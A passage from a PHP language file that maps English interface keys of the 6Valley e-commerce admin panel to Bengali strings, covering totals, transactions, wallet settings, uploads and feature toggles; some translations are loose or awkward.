খুঁজে পাওয়া যাবে না', 'the_product_report_will_show_based_on_the_product_added_date' => 'পণ্য প্রতিবেদনটি পণ্য যুক্ত তারিখের ভিত্তিতে প্রদর্শিত হবে', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'পণ্যগুলি এই তালিকায় দেখানো হয়েছে কোন পরিমাণটি নীচে রয়েছে', 'theme_delete_successfully' => 'থিম সফলভাবে মুছবেন', 'theme_mode' => 'থিম মোড', 'theme_setup' => 'থিম সেটআপ', 'theme_templates' => 'থিম টেম্পলেট', 'theme_upload_successfully!' => 'থিম সফলভাবে আপলোড!', 'there_may_be_some_features_that_are_not_available_in_other_themes.' => 'এমন কিছু ফীচার থাকতে পারে যা অন্যান্য থিমগুলিতে পাওয়া যায় না।', 'these_saved_data_is_only_applicable_only_for_' => 'এই সংরক্ষিত ডেটা কেবলমাত্র জন্য প্রযোজ্য', 'they_can_browse_and_search_for_products_from_each_brand_inside_any_shop' => 'তারা যে কোনও দোকানের ভিতরে প্রতিটি ব্র্যান্ড থেকে পণ্যগুলি ব্রাউজ করতে এন্ড সার্চ করতে পারে', 'they_cannot_purchase_or_place_order_from_your_shop' => 'তারা আপনার দোকান থেকে ক্রয় বা অর্ডার দিতে পারে না', 'they_register_6Valley_with_special_offer' => 'তারা বিশেষ অফার সহ 6 ভ্যালি নিবন্ধন করে', 'think_before_you_proceed' => 'আপনি এগিয়ে যাওয়ার আগে চিন্তা করুন', 'third_party_apis' => 'তৃতীয় পক্ষের এপিআই', 'third_party_delivery_tracking_id' => 'তৃতীয় পক্ষের ডেলিভারি ট্র্যাকিং আইডি', 'third_step' => 'তৃতীয় পদক্ষেপ', 'this_Month' => 'এই মাস', 'this_Months_Statistics' => 'এই মাসের পরিসংখ্যান', 'this_Week' => 'এই সপ্তাহ', 'this_Year' => 'এই বছর', 'this_app_version_means_the_minimum_version_of_Seller_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'এই অ্যাপ্লিকেশন সংস্করণটির অর্থ বিক্রেতা ডেলিভারি এন্ড গ্রাহক অ্যাপ্লিকেশনগুলির সর্বনিম্ন সংস্করণ যা আপডেটের জন্য প্রয়োজনীয়', 'this_count_is_the_summation_of' => 'এই গণনাটি এর সংমিশ্রণ', 'this_count_is_the_summation_of_delivered_orders' => 'এই গণনা হল ডেলিভারি অর্ডারের সংমিশ্রণ', 'this_coupon_is_valid_for_use_after_a_minimum_purchase_of' => 'এই কুপনটি সর্বনিম্ন ক্রয়ের পরে ব্যবহারের জন্য ভ্যালিড', 'this_discount_is_not_applied_for_this_amount' => 'এই ছাড় এই পরিমাণের জন্য প্রয়োগ করা হয় না', 'this_field_required' => 'এই ক্ষেত্র প্রয়োজন', 'this_helps_to_keep_your_new_password_secure.' => 'এটি আপনার নতুন পাসওয়ার্ডটি সুরক্ষিত রাখতে সহায়তা করে।', 'this_is_the_service_key_ID_file_and_also_after_AuthKey_that_is_the_key_ID' => 'এটি পরিষেবা কী আইডি ফাইল এন্ড অ্যাথির পরেও এটি কী আইডি', 'this_item_is_currently_sold_out' => 'এই উপকরনটি এইমাত্র বিক্রি হল', 'this_module_will_run_for_updates_after_version_13.1' => 'এই মডিউলটি 13.1 সংস্করণ পরে আপডেটের জন্য চলবে', 'this_month' => 'এই মাস', 'this_number_indicates_how_much_data_will_be_shown_in_the_list_or_table' => 'এই সংখ্যাটি তালিকা বা সারণীতে কত ডেটা প্রদর্শিত হবে তা নির্দেশ করে', 'this_shop_currently_close_now' => 'এই দোকানটি বর্তমানে এখন বন্ধ', 'this_shop_is_temporary_closed._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'এই দোকানটি অস্থায়ী বন্ধ। আপনি আপাতত এই দোকান থেকে কার্টে পণ্য যুক্ত করতে পারবেন না', 'this_shop_is_temporary_closed_or_on_vacation' => 'এই দোকানটি অস্থায়ী বন্ধ বা ছুটিতে', 'this_shop_is_temporary_closed_or_on_vacation.' => 'এই দোকানটি অস্থায়ী বন্ধ বা ছুটিতে রয়েছে।', 'this_shop_is_temporary_closed_or_on_vacation._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'এই দোকানটি অস্থায়ী বন্ধ বা ছুটিতে রয়েছে। আপনি আপাতত এই দোকান থেকে কার্টে পণ্য যুক্ত করতে পারবেন না', 'this_week' => 'এই সপ্তাহ', 'this_will_allow_the_system_to_send_emails_using_the_configured_SMTP_settings' => 'এটি কনফিগার করা এসএমটিপি সেটিংস ব্যবহার করে সিস্টেমটিকে ইমেলগুলি প্রেরণ করার অনুমতি দেবে', 'this_year' => 'এই বছর', 'this_year_earning' => 'এই বছর উপার্জন', 'ticket' => 'টিকিট', 'ticket_closed' => 'টিকিট বন্ধ', 'ticket_closed_successfully.' => 'টিকিট সফলভাবে বন্ধ হয়েছে।', 'time' => 'সময়', 'time_zone' => 'সময় অঞ্চল', 'title' => 'শিরোনাম', 'tls' => 'টিএলএস', 'to' => 'প্রতি', 'to_cancel_invoice' => 'প্রিন্ট ক্যানসেল করতে', 'to_click_add_new_customer' => 'নতুন গ্রাহক যোগ করতে ক্লিক করতে', 'to_click_cancel_cart_item_all' => 'সমস্ত কার্ট আইটেম ক্যানসেল করতে ক্লিক করুন', 'to_click_clear_cart' => 'ক্লিয়ার কার্ট ক্লিক করতে', 'to_click_coupon_discount' => 'কুপন ছাড় ক্লিক করতে', 'to_click_extra_discount' => 'অতিরিক্ত ছাড় ক্লিক করতে', 'to_click_new_order' => 'নতুন অর্ডার ক্লিক করতে', 'to_click_order' => 'অর্ডার ক্লিক করতে', 'to_click_payment_submit' => 'পেমেন্ট জমা দিতে ক্লিক করতে', 'to_click_short_cut_keys' => 'শর্ট কাট কীগুলি ক্লিক করতে', 'to_close_payment_submit' => 'পেমেন্ট জমা দিতে জমা দিন', 'to_date' => 'এখন পর্যন্ত', 'to_decrease_product_quantity_use_minus_before_number._Ex= -10' => 'পণ্যের পরিমাণ হ্রাস করতে সংখ্যার আগে মাইনাস ব্যবহার করুন। এক্সাম্পল=> -10', 'to_delete_change_the_default_language_first' => 'প্রথমে ডিফল্ট ভাষা পরিবর্তন করতে মুছতে', 'to_focus_search_input' => 'সার্চ ইনপুট ফোকাস করতে', 'to_get_delivery_updates' => 'ডেলিভারি আপডেট পেতে', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'সাইট কী এন্ড সিক্রেট কী পেতে ক্রেডেনটিয়াল পৃষ্ঠায় যান', 'to_print_invoice' => 'প্রিন্ট ইনভয়েস করতে', 'to_submit_add_new_customer_form' => 'জমা দেওয়ার জন্য নতুন গ্রাহক ফর্ম যুক্ত করুন', 'to_the_featured_section' => 'ফীচার ক্যাটাগরিে', 'to_view_your_order_sign_into_your' => 'আপনার অর্ডার সাইন আপনার মধ্যে দেখতে', 'to_view_your_order_sign_into_your 6Valley account_and_please_click_below_button' => 'আপনার 6 ভ্যালি অ্যাকাউন্টে আপনার অর্ডার চিহ্নটি দেখতে এন্ড নীচের বোতামটি ক্লিক করুন', 'to_view_your_order_sign_into_your6Valley' => 'আপনার অর্ডার চিহ্নটি আপনার 6 ভ্যালিতে দেখতে', 'to_wallet' => 'ওয়ালেট', 'todays_Statistics' => 'আজকের পরিসংখ্যান', 'toggle button from the top' => 'উপরে থেকে টগল বোতাম', 'token' => 'টোকেন', 'too_many_attempts. please_try_again_after_' => 'অনেক প্রচেষ্টা. দয়া করে আবার চেষ্টা করুন', 'top' => 'শীর্ষ', 'top rated' => 'শীর্ষ রেট', 'top-rated' => 'শীর্ষ রেট', 'top_Delivery_Man' => 'শীর্ষ ডেলিভারি ম্যান', 'top_Side_Banner' => 'শীর্ষ পাশের ব্যানার', 'top_customer' => 'শীর্ষ গ্রাহক', 'top_fashion_house' => 'শীর্ষ ফ্যাশন হাউস', 'top_rated' => 'শীর্ষ রেট', 'top_rated_product' => 'শীর্ষ রেটেড পণ্য', 'top_rated_product_from_this_store' => 'এই দোকান থেকে শীর্ষ রেটেড পণ্য', 'top_rated_seller' => 'শীর্ষ রেটেড বিক্রেতা', 'top_selling_products' => 'শীর্ষ বিক্রয় পণ্য', 'top_selling_store' => 'শীর্ষ বিক্রয় স্টোর', 'top_store_by_order_received' => 'অর্ডার দ্বারা শীর্ষ স্টোর', 'topic' => 'বিষয়', 'total' => 'মোট', 'total_Amount' => 'সর্বমোট পরিমাণ', 'total_Amount_Sold' => 'মোট পরিমাণ বিক্রি', 'total_Commission_given' => 'মোট কমিশন দেওয়া', 'total_Coupon_Discount' => 'মোট কুপন ছাড়', 'total_Customers' => 'মোট গ্রাহক', 'total_Delivery_Charge' => 'মোট ডেলিভারি চার্জ', 'total_Deliveryman' => 'মোট ডেলিভারিকারী', 'total_Discount_Given' => 'মোট ছাড় দেওয়া', 'total_Discounted_Amount' => 'মোট ছাড়ের পরিমাণ', 'total_Earning' => 'মোট উপার্জন', 'total_Earnings' => 'মোট উপার্জন', 'total_Expense' => 'সর্বমোট খরচ', 'total_Expense_Amount' => 'মোট ব্যয়ের পরিমাণ', 'total_In-House_Products' => 'মোট অভ্যন্তরীণ পণ্য', 'total_In_House_Products' => 'হাউস পণ্য মোট', 'total_Order' => 'মোট অর্ডার', 'total_Order_Amount' => 'মোট অর্ডার পরিমাণ', 'total_Ordered_Product_Price' => 'মোট অর্ডার করা পণ্য মূল্য', 'total_Orders' => 'মোট অর্ডার', 'total_Price' => 'মোট দাম', 'total_Product' => 'মোট পণ্য', 'total_Product_Amount' => 'মোট পণ্যের পরিমাণ', 'total_Product_Discount' => 'মোট পণ্য ছাড়', 'total_Product_Sale' => 'মোট পণ্য বিক্রয়', 'total_Products' => 'মোট পণ্য', 'total_Quantity' => 'মোট পরিমাণ', 'total_Quantity_Sold' => 'মোট পরিমাণ বিক্রি', 'total_Sale' => 'মোট বিক্রয়', 'total_Seller' => 'মোট বিক্রেতা', 'total_Seller_Products' => 'মোট বিক্রেতা পণ্য', 'total_Shop' => 'মোট দোকান', 'total_Shop_Earnings' => 'মোট দোকানের উপার্জন', 'total_Stores' => 'মোট স্টোর', 'total_Tax' => 'মোট কর', 'total_Transactions' => 'মোট ট্রান্সেকশন', 'total_amount' => 'সর্বমোট পরিমাণ', 'total_balance' => 'মোট ব্যালেন্স', 'total_business_overview' => 'মোট ব্যবসায়ের ওভারভিউ', 'total_collected_tax' => 'মোট সংগ্রহ করা কর', 'total_coupon_discount' => 'মোট কুপন ছাড়', 'total_delivery_charge' => 'মোট ডেলিভারি চার্জ', 'total_delivery_charge_earned' => 'মোট ডেলিভারি চার্জ অর্জন', 'total_discount' => 'মোট ছাড়', 'total_discounted_amount' => 'মোট ছাড়ের পরিমাণ', 'total_earning' => 'মোট উপার্জন', 'total_earnings' => 'মোট উপার্জন', 'total_expense' => 'সর্বমোট খরচ', 'total_expense_amount' => 'মোট ব্যয়ের পরিমাণ', 'total_expense_transactions' => 'মোট ব্যয় ট্রান্সেকশন', 'total_in_Wishlist' => 'উইশ লিস্টয় মোট', 'total_loyalty_point' => 'মোট লয়াল্টি পয়েন্ট', 'total_order' => 'মোট অর্ডার', 'total_order_amount' => 'মোট অর্ডার পরিমাণ', 'total_ordered_product_price' => 'মোট অর্ডার করা পণ্য মূল্য', 'total_orders' => 'মোট অর্ডার', 'total_point' => 'মোট পয়েন্ট', 'total_price' => 'মোট দাম', 'total_price_for_this_product' => 'এই পণ্য জন্য মোট মূল্য', 'total_product' => 'মোট পণ্য', 'total_product_amount' => 'মোট পণ্যের পরিমাণ', 'total_product_discount' => 'মোট পণ্য ছাড়', 'total_products' => 'মোট পণ্য', 'total_refund_amount' => 'মোট রিফান্ডের পরিমাণ', 'total_refundable_amount' => 'মোট রিফান্ডযোগ্য পরিমাণ', 'total_sale_of' => 'মোট বিক্রয়', 'total_settled_amount' => 'মোট নিষ্পত্তি পরিমাণ', 'total_sold' => 'মোট বিক্রি', 'total_tax' => 'মোট কর', 'total_tax_collected' => 'মোট কর আদায় করা হয়েছে', 'total_tax_given' => 'মোট কর দেওয়া', 'total_transaction' => 'মোট ট্রান্সেকশন', 'total_transactions' => 'মোট ট্রান্সেকশন', 'total_withdraw' => 'মোট উইথড্র', 'totals' => 'মোট', 'totals_cost' => 'মোট ব্যয়', 'touch' => 'টাচ', 'track_ID' => 'ট্র্যাক আইডি', 'track_Order' => 'ট্র্যাক অর্ডার', 'track_Order_Result' => 'ট্র্যাক অর্ডার ফলাফল', 'track_order' => 'ট্র্যাক অর্ডার', 'track_order_result' => 'ট্র্যাক অর্ডার ফলাফল', 'track_your_order' => 'আপনার অর্ডার ট্র্যাক করুন', 'tracking_id' => 'ট্র্যাকিং আইডি', 'tracking_status' => 'ট্র্যাকিং স্ট্যাটাস', 'transaction' => 'ট্রান্সেকশন', 'transaction id' => 'ট্রান্সেকশন নাম্বার', 'transaction_Date' => 'ট্রান্সেকশন তারিখ', 'transaction_ID' => 'ট্রান্সেকশন নাম্বার', 'transaction_Report' => 'ট্রান্সেকশন প্রতিবেদন', 'transaction_date' => 'ট্রান্সেকশন তারিখ', 'transaction_history' => 'ট্রান্সেকশন সামারি', 'transaction_id' => 'ট্রান্সেকশন নাম্বার', 'transaction_report' => 'ট্রান্সেকশন প্রতিবেদন', 'transaction_table' => 'ট্রান্সেকশন টেবিল', 'transaction_type' => 'ট্রান্সেকশন প্রকার', 'transactions' => 'ট্রান্সেকশন', 'transection_history' => 'ট্রান্সেকশন ইতিহাস', 'translate' => 'অনুবাদ করুন', 'translations' => 'অনুবাদ', 'true' => 'সত্য', 'turn' => 'ঘুরিয়ে', 'turn off' => 'বন্ধ কর', 'turn on' => 'চালু করা', 'turn_OFF' => 'বন্ধ কর', 'turn_off' => 'বন্ধ কর', 'turn_on' => 'চালু করা', 'twilio_sms' => 'twilio_sms', 'twitter' => 'টুইটার', 'twitter_API_Set_up_Instructions' => 'টুইটার এপিআই নির্দেশাবলী সেট আপ', 'type' => 'প্রকার', 'type _your_message' => 'আপনার মেসেজ টাইপ করুন', 'type_Answer' => 'Type Answer', 'type_Question' => 'Type Question', 'type_here' => 'এখানে লিখুন', 'type_something' => 'কিছু লিখুন', 'type_your_message_here' => 'এখানে আপনার মেসেজ টাইপ করুন', 'type_your_message_here..' => 'এখানে আপনার মেসেজ টাইপ করুন..', 'type_your_subtitle_text' => 'আপনার সাবটাইটেল টেক্সট টাইপ করুন', 'type_your_title_text' => 'আপনার শিরোনাম টেক্সট টাইপ করুন', 'unblock' => 'আনব্লক', 'unit' => 'ইউনিট', 'unit_price' => 'একক দাম', 'unit_price_($)' => 'ইউনিট মূল্য ($)', 'unpaid' => 'আন পেইড', 'upcoming_campaign' => 'আসন্ন প্রচার', 'update' => 'আপডেট', 'update_&_Publish' => 'আপডেট এন্ড পাবলিশ', 'update_cart' => 'আপডেট কার্ট', 'update_category_shipping_cost' => 'ক্যাটাগরি শিপিং ব্যয় আপডেট করুন', 'update_discount' => 'আপডেট ছাড়', 'update_information_to_continue' => 'চালিয়ে যেতে তথ্য আপডেট করুন', 'update_option_is_disabled_for_demo' => 'আপডেট অপসনটি ডেমো জন্য ডিস্যাবল', 'update_product' => 'পণ্য আপডেট করুন', 'update_product_list' => 'পণ্য তালিকা আপডেট করুন', 'update_product_quantity' => 'পণ্য পরিমাণ আপডেট করুন', 'update_quantity' => 'আপডেট পরিমাণ', 'update_successful' => 'সফল আপডেট', 'update_tax' => 'ট্যাক্স আপডেট', 'update_third_party_delivery_info' => 'তৃতীয় পক্ষের ডেলিভারি তথ্য আপডেট করুন', 'update_this_Address' => 'এই ঠিকানা আপডেট করুন', 'update_this_address' => 'এই ঠিকানা আপডেট করুন', 'update_to_cart' => 'কার্ট আপডেট', 'update_your_bank_info_first' => 'প্রথমে আপনার ব্যাঙ্কের তথ্য আপডেট করুন', 'সফলভাবে আপডেট করা হয়েছে৷!' => 'সফলভাবে আপডেট হয়েছে!', 'updated_file' => 'আপডেট ফাইল', 'updated_files' => 'আপডেট করা ফাইল', 'updated_product_list' => 'আপডেট পণ্য তালিকা', 'updated_products' => 'আপডেট পণ্য', 'updated_successfully' => 'সফলভাবে আপডেট হয়েছে', 'updated_successfully!' => 'সফলভাবে আপডেট হয়েছে!', 'upload' => 'আপলোড', 'upload it in the form below and submit.' => 'এটি নীচের আকারে আপলোড করুন এন্ড জমা দিন।', 'upload_&_update' => 'আপলোড এন্ড আপডেট', 'upload_Addons' => 'অ্যাডন আপলোড করুন', 'upload_Banner' => 'ব্যানার আপলোড করুন', 'upload_Icon' => 'আইকন আপলোড করুন', 'upload_Picture_on_Delivery' => 'ডেলিভারির ছবি আপলোড করুন', 'upload_additional_image' => 'অতিরিক্ত চিত্র আপলোড করুন', 'upload_additional_product_images' => 'অতিরিক্ত পণ্য চিত্র আপলোড করুন', 'upload_any_additional_images_for_this_product_from_here' => 'এখান থেকে এই পণ্যটির জন্য কোনও অতিরিক্ত চিত্র আপলোড করুন', 'upload_file' => 'ফাইল আপলোড করুন', 'upload_image' => 'চিত্র আপলোড', 'upload_it_in_the_form_below_and_submit.' => 'এটি নীচের আকারে আপলোড করুন এন্ড জমা দিন।', 'upload_logo' => 'লোগো আপলোড করুন', 'upload_max_file size' => 'সর্বাধিক ফাইল সাইজ আপলোড করুন', 'upload_product_images' => 'পণ্য চিত্র আপলোড করুন', 'upload_the_digital_products_from_here' => 'এখান থেকে ডিজিটাল পণ্য আপলোড করুন', 'upload_the_updated_file' => 'আপডেট হওয়া ফাইল আপলোড করুন', 'upload_theme' => 'থিম আপলোড করুন', 'upload_thumbnail' => 'থাম্বনেইল আপলোড করুন', 'upload_zip_file' => 'জিপ ফাইল আপলোড করুন', 'uploaded_file' => 'আপলোড ফাইল', 'urgent' => 'জরুরি', 'use_referral_code' => 'রেফারেল কোড ব্যবহার করুন', 'use_the_code_to_change_your_password_on_our_secure_website.' => 'আমাদের নিরাপদ ওয়েবসাইটে আপনার পাসওয়ার্ড পরিবর্তন করতে কোডটি ব্যবহার করুন।', 'used' => 'ব্যবহৃত', 'usename' => 'সেনাম', 'user' => 'ব্যবহারকারী', 'user_Section' => 'ব্যবহারকারী ক্যাটাগরি', 'user_app_version_control' => 'ব্যবহারকারী অ্যাপ্লিকেশন সংস্করণ নিয়ন্ত্রণ', 'user_can_place_order_without_login' => 'ব্যবহারকারী লগইন ছাড়াই অর্ডার রাখতে পারেন', 'user_cannot_place_order_without_login' => 'ব্যবহারকারী লগইন ছাড়া অর্ডার রাখতে পারে না', 'user_limit' => 'ব্যবহারকারীর সীমা', 'user_management' => 'ইউজার ম্যানেজমেন্ট', 'user_section' => 'ব্যবহারকারী ক্যাটাগরি', 'username' => 'ব্যবহারকারীর নাম', 'vacation_End' => 'ছুটির শেষ', 'vacation_Mode' => 'ভ্যাকেশন মোড', 'vacation_Note' => 'ভ্যাকেশন নোট', 'vacation_Start' => 'ভ্যাকেশন শুরু', 'valid_OAuth_Redirect_URIs' => 'ভ্যালিড OAuth uris পুনর্নির্দেশ', 'valid_till' => 'ভ্যালিড', 'value' => 'মান', 'value_is_grater _or_equal_to_180M' => 'মান গ্রেটার বা 180 মিটার সমান', 'value_is_grater _or_equal_to_20M' => 'মান গ্রেটার বা 20 মিটার সমান', 'value_is_grater _or_equal_to_20MB' => 'মান গ্রেটার বা 20MB এর সমান', 'value_is_grater_or_equal_to_200M' => 'মান গ্রেটার বা 200 মিটার সমান', 'value_is_grater_or_equal_to_20M' => 'মান গ্রেটার বা 20 মিটার সমান', 'value_is_grater_or_equal_to_20MB' => 'মান গ্রেটার বা 20MB এর সমান', 'variant' => 'বৈকল্পিক', 'variant Price' => 'বৈকল্পিক মূল্য', 'variant_Price' => 'বৈকল্পিক মূল্য', 'variation' => 'ভ্যারিয়েশন', 'variation wise product test' => 'ভ্যারিয়েশন অনুসারে পণ্য চেক', 'variations' => 'ভ্যারিয়েশন', 'various product' => 'বিভিন্ন পণ্য', 'vat' => 'ভ্যাট', 'verification' => 'প্রতিপাদন', 'verification_code' => 'ভেরিফিকেশন কোড', 'verification_done_successfully' => 'ভেরিফিকেশন সফলভাবে সম্পন্ন হয়েছে', 'verification_successfully_completed' => 'ভেরিফিকেশন সফলভাবে সম্পন্ন হয়েছে', 'verify' => 'যাচাই করুন', 'verify_information_to_continue' => 'চালিয়ে যাওয়ার জন্য তথ্য যাচাই করুন', 'verify_status' => 'স্ট্যাটাস যাচাই করুন', 'view' => 'দেখুন', 'view more' => 'আরো দেখুন', 'view_Order_Details' => 'ডিটেলস নির্দেশিকা দেখো', 'view_all' => 'সব দেখুন', 'view_all_cart_items' => 'সমস্ত কার্ট আইটেম দেখুন', 'view_all_hold_orders' => 'সমস্ত হোল্ড অর্ডার দেখুন', 'view_cart' => 'কার্ট দেখুন', 'view_less' => 'কম দেখুন', 'view_live' => 'লাইভ দেখুন', 'view_more' => 'আরো দেখুন', 'view_website' => 'ওয়েবসাইট দেখুন', 'visit' => 'দেখুন', 'visit_Store' => 'দোকান দর্শন করুন।', 'visit_again' => 'আবার দেখুন', 'visit_shop' => 'দোকান দেখুন', 'visit_website' => 'ওয়েবসাইট', 'waiting_for_location' => 'লোকেশনের জন্য অপেক্ষা করছি', 'walking customer' => 'হাঁটা গ্রাহক', 'walking_customer' => 'ওয়াকিং কাস্টমার', 'wallet' => 'ওয়ালেট', 'wallet transactions' => 'ওয়ালেট ট্রান্সেকশন', 'wallet_Amount' => 'ওয়ালেট পরিমাণ', 'wallet_Bonus_Added_Successfully' => 'ওয়ালেট বোনাস সফলভাবে যুক্ত হয়েছে', 'wallet_Bonus_Setup' => 'ওয়ালেট বোনাস সেটআপ', 'wallet_Bonus_Table' => 'ওয়ালেট বোনাস টেবিল', 'wallet_Payments' => 'ওয়ালেট পেমেন্ট', 'wallet_amount' => 'ওয়ালেট পরিমাণ', 'wallet_bonus' => 'ওয়ালেট বোনাস', 'wallet_bonus_edit' => 'ওয়ালেট বোনাস এডিট ', 'wallet_bonus_is_only_applicable_when_a_customer_add_fund_to_wallet_via_outside_payment_gateway' => 'ওয়ালেট বোনাস কেবল তখনই প্রযোজ্য যখন কোনও গ্রাহক বাইরের পেমেন্ট গেটওয়ের মাধ্যমে ওয়ালেটে ফান্ড যুক্ত করেন', 'wallet_bonus_setup' => 'ওয়ালেট বোনাস সেটআপ', 'wallet_payment' => 'ওয়ালেট পেমেন্ট', 'wallet_statistics' => 'ওয়ালেট পরিসংখ্যান', 'want_to_Turn_OFF_' => 'বন্ধ করতে চান', 'want_to_Turn_OFF_Add_Fund_to_Wallet_option' => 'ওয়ালেট বিকল্পে অ্যাড ফান্ড বন্ধ করতে চান', 'want_to_Turn_OFF_Billing_Address_in_Checkout' => 'চেকআউটে বিলিং ঠিকানা বন্ধ করতে চান', 'want_to_Turn_OFF_Customer_Wallet' => 'গ্রাহক ওয়ালেট বন্ধ করতে চান', 'want_to_Turn_OFF_Delivery_Available_Country' => 'ডেলিভারি এভেইল্যাবলে দেশ বন্ধ করতে চান', 'want_to_Turn_OFF_Delivery_Available_Zip_Code_Area' => 'ডেলিভারি এভেইল্যাবলে জিপ কোড অঞ্চলটি বন্ধ করতে চান', 'want_to_Turn_OFF_Digital_Product' => 'ডিজিটাল পণ্য বন্ধ করতে চান', 'want_to_Turn_OFF_Free_Delivery' => 'বিনামূল্যে ডেলিভারি বন্ধ করতে চান', 'want_to_Turn_OFF_Loyalty_Point' => 'লয়াল্টি পয়েন্ট বন্ধ করতে চান', 'want_to_Turn_OFF_Minimum_Order_Amount' => 'ন্যূনতম অর্ডার পরিমাণ বন্ধ করতে চান', 'want_to_Turn_OFF_Order_Delivery_Verification' => 'অর্ডার ডেলিভারি ভেরিফিকেশন বন্ধ করতে চান', 'want_to_Turn_OFF_POS_for_Seller' => 'বিক্রেতার জন্য POS বন্ধ করতে চান', 'want_to_Turn_OFF_Product_Brand' => 'পণ্য ব্র্যান্ড বন্ধ করতে চান', 'want_to_Turn_OFF_Referral_And_Earning_option' => 'রেফারেল এন্ড উপার্জন অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_Refund_to_Wallet_option' => 'ওয়ালেট বিকল্পে রিফান্ড বন্ধ করতে চান', 'want_to_Turn_OFF_Self_Registration' => 'স্ব নিবন্ধকরণ বন্ধ করতে চান', 'want_to_Turn_OFF_the_App_Store_button' => 'অ্যাপ স্টোর বোতামটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Cash_On_Delivery_option' => 'ক্যাশ অন ডেলিভারি অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Digital_Payment_option' => 'ডিজিটাল পেমেন্ট অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Email_Verification' => 'ইমেল ভেরিফিকেশন বন্ধ করতে চান', 'want_to_Turn_OFF_the_Google_Play_Store_button' => 'গুগল প্লে স্টোর বোতামটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Guest_Checkout_Mode' => 'অতিথি চেকআউট মোডটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_OTP_Verification' => 'ওটিপি ভেরিফিকেশন বন্ধ করতে চান', 'want_to_Turn_OFF_the_Offline_Payment_option' => 'অফলাইন পেমেন্ট অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Set_Minimum_Order_Amount_option' => 'সেট ন্যূনতম অর্ডার পরিমাণ অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_Temporary_Close_option' => 'অস্থায়ী ঘনিষ্ঠ অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_sendgrid_mail_config_option' => 'সেন্ডগ্রিড মেল কনফিগার অপসনটি বন্ধ করতে চান', 'want_to_Turn_OFF_the_smtp_mail_config_option' => 'এসএমটিপি মেল কনফিগার অপসনটি বন্ধ করতে চান', 'want_to_Turn_ON_' => 'চালু করতে চান', 'want_to_Turn_ON_Add_Fund_to_Wallet_option' => 'ওয়ালেট বিকল্পে অ্যাড ফান্ড চালু করতে চান', 'want_to_Turn_ON_Billing_Address_in_Checkout' => 'চেকআউটে বিলিং ঠিকানা চালু করতে চান', 'want_to_Turn_ON_Customer_Wallet' => 'গ্রাহক ওয়ালেট চালু করতে চান', 'want_to_Turn_ON_Delivery_Available_Country' => 'ডেলিভারি এভেইল্যাবলে দেশ চালু করতে চান', 'want_to_Turn_ON_Delivery_Available_Zip_Code_Area' => 'ডেলিভারি এভেইল্যাবলে জিপ কোড অঞ্চল চালু করতে চান', 'want_to_Turn_ON_Digital_Product' => 'ডিজিটাল পণ্য চালু করতে চান', 'want_to_Turn_ON_Free_Delivery' => 'বিনামূল্যে ডেলিভারি চালু করতে চান', 'want_to_Turn_ON_Loyalty_Point' => 'লয়াল্টি পয়েন্ট চালু করতে চান', 'want_to_Turn_ON_Minimum_Order_Amount' => 'ন্যূনতম অর্ডার পরিমাণ চালু করতে চান', 'want_to_Turn_ON_Order_Delivery_Verification' => 'অর্ডার ডেলিভারি ভেরিফিকেশন চালু করতে চান', 'want_to_Turn_ON_POS_for_Seller' => 'বিক্রেতার জন্য POS চালু করতে চান', 'want_to_Turn_ON_Product_Brand' => 'পণ্য ব্র্যান্ড চালু করতে চান', 'want_to_Turn_ON_Referral_And_Earning_option' => 'রেফারেল এন্ড উপার্জন অপসনটি চালু করতে চান', 'want_to_Turn_ON_Refund_to_Wallet_option' => 'ওয়ালেট বিকল্পে রিফান্ড চালু করতে চান', 'want_to_Turn_ON_Self_Registration' => 'স্ব নিবন্ধকরণ চালু করতে চান', 'want_to_Turn_ON_the_App_Store_button' => 'অ্যাপ স্টোর বোতামটি চালু করতে চান', 'want_to_Turn_ON_the_Cash_On_Delivery_option' => 'ক্যাশ অন ডেলিভারি অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_Digital_Payment_option' => 'ডিজিটাল পেমেন্ট অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_Email_Verification' => 'ইমেল ভেরিফিকেশন চালু করতে চান', 'want_to_Turn_ON_the_Google_Play_Store_button' => 'গুগল প্লে স্টোর বোতামটি চালু করতে চান', 'want_to_Turn_ON_the_Guest_Checkout_Mode' => 'অতিথি চেকআউট মোডটি চালু করতে চান', 'want_to_Turn_ON_the_OTP_Verification' => 'ওটিপি ভেরিফিকেশন চালু করতে চান', 'want_to_Turn_ON_the_Offline_Payment_option' => 'অফলাইন পেমেন্ট অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_Set_Minimum_Order_Amount_option' => 'সেট ন্যূনতম অর্ডার পরিমাণ অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_Temporary_Close_option' => 'অস্থায়ী ঘনিষ্ঠ অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_sendgrid_mail_configt_option' => 'সেন্ডগ্রিড মেল কনফিগারেশন অপসনটি চালু করতে চান', 'want_to_Turn_ON_the_smtp_mail_configt_option' => 'এসএমটিপি মেল কনফিগারেশন অপসনটি চালু করতে চান', 'want_to_Turn_Off_' => 'বন্ধ করতে চান', 'want_to_Turn_Off_the_Cash_On_Delivery_option' => 'ক্যাশ অন ডেলিভারি অপসনটি বন্ধ করতে চান', 'want_to_Turn_Off_the_Digital_Payment_option' => 'ডিজিটাল পেমেন্ট অপসনটি বন্ধ করতে চান', 'want_to_Turn_Off_the_Offline_Payment_option' => 'অফলাইন পেমেন্ট অপসনটি বন্ধ করতে চান', 'want_to_Turn_On_' => 'চালু করতে চান', 'want_to_Turn_On_the_Cash_On_Delivery_option' => 'ক্যাশ অন ডেলিভারি অপসনটি চালু করতে চান', 'want_to_Turn_On_the_Digital_Payment_option' => 'ডিজিটাল পেমেন্ট অপসনটি চালু করতে চান', 'want_to_Turn_On_the_Offline_Payment_option' => 'অফলাইন পেমেন্ট অপসনটি চালু করতে চান', 'want_to_add_this_product' => 'এই পণ্য 